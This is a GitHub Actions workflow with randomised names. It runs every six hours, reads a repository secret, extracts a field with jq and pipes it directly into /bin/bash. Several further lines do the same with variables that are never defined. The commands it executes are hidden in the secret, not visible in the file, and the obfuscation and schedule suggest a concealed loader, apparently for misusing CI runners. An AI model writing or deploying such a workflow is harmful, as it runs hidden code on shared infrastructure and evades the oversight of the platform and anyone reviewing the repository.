name: qiyufeng3718

on:
  workflow_dispatch:
  schedule:
    - cron: '38 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiyufeng3718
        env:
          ygvlv5: ${{ secrets.ygvlv5 }}
        run: |
          echo $ygvlv5 | jq -r .nocz0 | /bin/bash
          echo $v90152 | jq -r .dmw5299 | /bin/bash
          echo $ymxfo27937 | jq -r .eamt88 | /bin/bash
          echo $z0 | jq -r .l86433 | /bin/bash
          echo $w39 | jq -r .knwkn9 | /bin/bash
          echo $vfsot1 | jq -r .tgi2 | /bin/bash
          echo $t4855 | jq -r .ylfqi22 | /bin/bash

